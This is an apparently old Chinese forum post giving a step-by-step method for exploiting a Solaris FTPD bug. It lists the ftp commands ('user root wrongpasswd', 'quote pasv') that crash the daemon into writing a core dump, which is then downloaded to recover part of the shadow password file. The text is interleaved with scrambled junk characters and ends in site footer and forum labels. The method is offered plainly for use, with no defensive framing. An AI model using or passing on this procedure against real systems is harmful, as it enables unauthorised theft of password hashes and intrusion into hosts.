该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
% ]6 K: T4 `, t5 i4 D2 ~' t+ F3 i6 Y0 z# t( u8 a& U9 `" f
1.通过 ftp 正常登录到目的主机上" R5 G1 G Z$ ^) T& h# E
* u e1 Y' H$ ?1 W2.输入如下命令序列:
0 W) o& o- E& p$ X( R
4 p1 W: V$ k$ k F' w- {ftp> user root wrongpasswd
: a* S2 e, ]& Q& d2 }, j1 B/ a V7 }! F
ftp> quote pasv& p, Z/ R0 E* @, `" j: q& F( [) o3 a
5 D' L. G0 z) q& z# V5 y) @3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
: e! |: k, w5 N# V: p7 K. W# i9 E: P( U# e+ A8 _) }6 `( m
4.再次进入FTP >get core" i' D$ d# O! n0 E7 E: t
9 E6 d5 `, h# j# c% E* ?6 J
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了& R- E2 \- A: a7 E$ W
" v1 F$ w* P) K' K$ ]; ` |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡